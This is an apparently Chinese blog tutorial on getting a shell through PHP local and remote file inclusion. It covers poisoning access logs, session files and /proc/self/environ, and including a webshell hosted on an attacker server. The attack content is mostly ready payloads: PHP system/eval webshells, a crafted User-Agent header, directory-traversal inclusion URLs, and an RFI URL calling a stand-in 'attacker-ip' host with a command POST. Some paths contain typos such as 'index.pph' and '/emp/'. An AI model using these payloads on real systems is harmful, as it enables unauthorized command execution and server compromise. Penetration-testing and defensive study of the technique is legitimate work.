利用文件包含GetShell

Z1eaf_complete2026-03-16 9:45

一、本地文件包含getshell

1-日志文件

原理 :当我们访问目标网站时,我们的访问请求会被记录在日志文件中(access.logerror.log),我们可以在访问路径拼接恶意代码,配合文件包含漏洞解析执行恶意代码
条件:需要知道日志文件的位置和名称

(1)注入恶意代码

通过一个特制的HTTP请求,将恶意代码(PHP Webshell)注入到服务器日志文件中。我们可以在URLUser-Agent字段中写入WebShell

php 复制代码 
<?php @system($_POST['cmd']);?>

我们就插入到URL中,这里我们需要用burpsuite抓包插入,因为直接在浏览器中插入,代码会被URL编码

(2)包含日志文件

利用本地文件包含漏洞,通过文件包含参数(如file)包含日志文件

复制代码 
http://php/include.php?file=E:\phpstudy_pro\Extensions\Apache2.4.39\logs\access.log.1773532800

当服务器执行这个请求的时候,它会把日志文件的内容当作php代码来执行,从而执行我们注入的命令whoami

复制代码 
http://php/include.php?file=E:\phpstudy_pro\Extensions\Apache2.4.39\logs\access.log.1773532800&cmd=whoami

2-session文件

原理 :某些Web应用程序会将用户的Session信息保存在某些服务器的tmp目录下,文件命名通常为sess_PHPSESSID。如果攻击者可以控制Session数据,就能通过LFI包含该文件getshell
条件

  1. 知道Session存储路径
  2. 能够控制Session数据,特别是变量名
  3. Session存储路径可访问(常见路径如/var/lib/php/sessions//tmp/等)。

(1)设置Session值

通过$_SESSION变量,将恶意代码注入到Session中。这通常需要先找到一个可以控制Session值的参数,例如在登录或注册时

复制代码 
$_SESSION['username']="<?php eval($_POST['cmd']);?>";

(2)获取文件路径

通常Session的命名为sess_加上Session ID。看通过浏览器Cookies中的PHPSESSID来获取 ,然后将文件包含

复制代码 
http://example.com/index.pph?file=../../../../emp/sess_aadadaw212eda2131da13123

(3)执行恶意代码

当LFI漏洞包含该Session文件时,恶意代码被执行

3-/proc/self/environ

在Linux系统中,/proc/self/environ文件存储了当前进程的环境变量。攻击者可以通过设置User-Agent等环境变量,将恶意代码注入到该文件中,利用LFI漏洞包含

(1)设置User-Agent

发送一个带有恶意User-Agent的请求

复制代码 
GET /index.php?page=test.php
HTTP/1.1
Host:example.com
User-Agent: <?php @system('whoami');?>

(2)包含环境变量文件

复制代码 
http://example.com/index.php?file=../../../../proc/self/environ

(3)执行命令

当LFI漏洞包含该文件时,恶意代码被执行

二、远程文件包含getshell

RFI通常LFI更容易利用,因为它允许攻击者直接从自己的服务器上包含并执行恶意文件

(1)制作Webshell文件

在攻击者自己的服务器上创建一个Webshell文件,例如:

php 复制代码 
<?php @system($_POST['cmd']);?>

为了绕过一些过滤,文件名可以不使用.php后最,例如:shell.txtshell.jpg

(2)启动HTTP服务

在攻击者的服务器上开启有一个简单的HTTP服务来托管shell.txt

复制代码 
python -m http.server 80

(3)远程文件包含

利用RFI漏洞,将URL指向攻击者服务器,包含shell.txt

复制代码 
http://example.com/index.php?file=http://attacker-ip/shell.txt

注意:为了防止服务器对URL过滤,有时候需要使用编码、伪协议等技巧绕过

(4)执行命令

如果成功,shell.txt中的Webshell代码已经被执行,可以使用工具或直接在URL中POST数据来执行命令

复制代码 
POST /index.php?file=http://attacker-ip/shell.txt HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded

cmd=ls -al
相关推荐
67X5 分钟前
【论文写作】基于深度学习的异常检测方法(Deep learning-based anomaly detection methods)
深度学习·网络安全
云栖梦泽1 小时前
【AI】AI安全工具:AI模型安全检测工具的实战使用
人工智能·安全·机器学习
IeE1QQ3GT1 小时前
FastAPI + SQLite:从基础CRUD到安全并发的实战指南
安全·sqlite·fastapi
KC2701 小时前
大模型提示词注入攻击与防御:当你的 AI 开始“不听话“
人工智能·安全·aigc
Arvin_Rong1 小时前
Linux 服务器 /tmp 目录:使用机制与安全加固
linux·服务器·安全
菩提小狗2 小时前
每日安全情报报告 · 2026-04-05
网络安全·漏洞·cve·安全情报·每日安全
vortex52 小时前
一文厘清DDoS与CC攻击
网络·网络安全·渗透测试·ddos
OPHKVPS2 小时前
Swimlane发布AI SOC:深度Agent驱动的安全运营新时代
人工智能·安全
电磁脑机2 小时前
人类分布式大脑架构与文明、技术、安全的底层逻辑——原创大脑架构理论研究
网络·分布式·神经网络·安全·架构
七夜zippoe2 小时前
应用安全实践(一):常见Web漏洞(OWASP Top 10)与防护
java·前端·网络·安全·owasp
热门推荐
01GitHub 镜像站点02Qwen3.5-Omni与Qwen3.6模型全面解析(含测评/案例/使用教程)03VMware Workstation Pro 17 虚拟机完整安装教程(2026最新)04OpenClaw 请求超时 llm request timed out 怎么解决?3 种方案实测,附完整排查流程05纯 HTML/CSS/JS 实现的高颜值登录页,还会眨眼睛!少女心爆棚!06【技术干货】Gemma 4 上手深度指南:本地多模态大模型的新基线072026年3月AI领域大事件:DeepSeek引领开源风暴08最新更新版本,OpenClaw v2026.4.2 深度解读剖析:Task Flow 重磅回归与安全架构的全面硬化09AI 编程效率翻倍:Superpowers Skills 上手清单 + 完整指南10Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services